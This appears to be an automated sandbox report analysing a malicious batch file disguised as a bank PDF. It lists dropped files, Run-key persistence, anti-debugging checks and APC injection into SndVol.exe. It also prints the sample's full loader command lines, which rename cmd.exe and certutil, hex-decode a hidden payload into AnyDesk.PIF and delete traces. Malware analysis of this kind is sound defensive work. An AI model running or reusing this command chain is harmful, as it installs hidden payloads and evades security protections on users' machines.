              Source: Yara matchFile source: 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D4894C
              Source: alpha.exe.3.drStatic PE information: section name: .didat
              Source: kn.exe.5.drStatic PE information: section name: .didat
              Source: alpha.pif.16.drStatic PE information: section name: .didat
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC33668 push rsp; ret 7_2_00007FF68FC33669
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D363B0 push 02D3640Bh; ret 10_2_02D36403
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D363AE push 02D3640Bh; ret 10_2_02D36403
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3C349 push 8B02D3C1h; ret 10_2_02D3C34E
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5C378 push 02D5C56Eh; ret 10_2_02D5C566
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0C198 push eax; ret 10_2_02E0C1B6
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DEA166 push ecx; ret 10_2_02DEA179
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D36782 push 02D367C6h; ret 10_2_02D367BE
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D36784 push 02D367C6h; ret 10_2_02D367BE
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5C570 push 02D5C56Eh; ret 10_2_02D5C566
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3C56C push ecx; mov dword ptr [esp], edx10_2_02D3C571
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4AADF push 02D4AB18h; ret 10_2_02D4AB10
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D48AD8 push 02D48B10h; ret 10_2_02D48B08
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4AAE0 push 02D4AB18h; ret 10_2_02D4AB10
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3CBEC push 02D3CD72h; ret 10_2_02D3CD6A
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DA4850 push eax; ret 10_2_02DA4920
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4886C push 02D488AEh; ret 10_2_02D488A6
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3C9DF push 02D3CD72h; ret 10_2_02D3CD6A
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D46946 push 02D469F3h; ret 10_2_02D469EB
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D46948 push 02D469F3h; ret 10_2_02D469EB
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D42F60 push 02D42FD6h; ret 10_2_02D42FCE
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5D2FC push 02D5D367h; ret 10_2_02D5D35F
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3332C push eax; ret 10_2_02D33368
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5D0AC push 02D5D125h; ret 10_2_02D5D11D
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4306C push 02D430B9h; ret 10_2_02D430B1
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4306B push 02D430B9h; ret 10_2_02D430B1
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5D1F8 push 02D5D288h; ret 10_2_02D5D280
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5D144 push 02D5D1ECh; ret 10_2_02D5D1E4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4F108 push ecx; mov dword ptr [esp], edx10_2_02D4F10D
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D3D5A0 push 02D3D5CCh; ret 10_2_02D3D5C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0B876 push ecx; ret 10_2_02E0B889

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Faogvkgh.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Faogvkgh.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FaogvkghJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FaogvkghJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: pdf.batStatic PE information: USD470900_COPY_800BLHSBC882001.PDF.bat
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_02D4AB1C
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 4346Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 5645Jump to behavior
              Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096Thread sleep count: 4346 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096Thread sleep time: -13038000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096Thread sleep count: 5645 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 8096Thread sleep time: -16935000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6A0E97B4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A0E97B4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE3100
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE10C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68FCE6F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68FC7C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68FCE234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC85E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68FC85E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68FC8DBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68FCE1B04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68FCE19F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68FCC3674
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68FC8D4A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68FC8B3D8
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D35908
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF68FCC511C
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPn
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C198000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879867205.000000001C198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Faogvkgh.PIF, 00000016.00000002.1638185112.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1715016353.00000000005D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_02D4F744
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess queried: DebugPort
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess queried: DebugPort
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E963FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF6A0E963FC
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D4894C
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF7D45 mov eax, dword ptr fs:[00000030h]10_2_02DF7D45
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E84A14 GetEnvironmentStringsW,GetProcessHeap,HeapAlloc,memmove,FreeEnvironmentStringsW,4_2_00007FF6A0E84A14
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E893B0 SetUnhandledExceptionFilter,4_2_00007FF6A0E893B0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6A0E88FA4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E893B0 SetUnhandledExceptionFilter,6_2_00007FF6A0E893B0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6A0E88FA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD14E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF68FD14E18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD153E0 SetUnhandledExceptionFilter,7_2_00007FF68FD153E0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
              Allocates memory in foreign processes
              Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2C00000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 27D0000 protect: page execute and read and write
              Drops or copies certutil.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Queues an APC in another process (thread injection)
              Source: C:\Users\Public\Libraries\AnyDesk.PIFThread APC queued: target process: C:\Windows\SysWOW64\SndVol.exeJump to behavior
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF68FCC7024
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCB4AF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCB4E88
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DE9F6A cpuid 10_2_02DE9F6A
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF6A0E851EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF6A0E83140
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF6A0E76EE4
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF6A0E851EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF6A0E83140
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF6A0E76EE4
              Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF68FD13800
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D35ACC
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,10_2_02D3A7C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,10_2_02D3A810
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_02D35BD8
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E89584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,4_2_00007FF6A0E89584
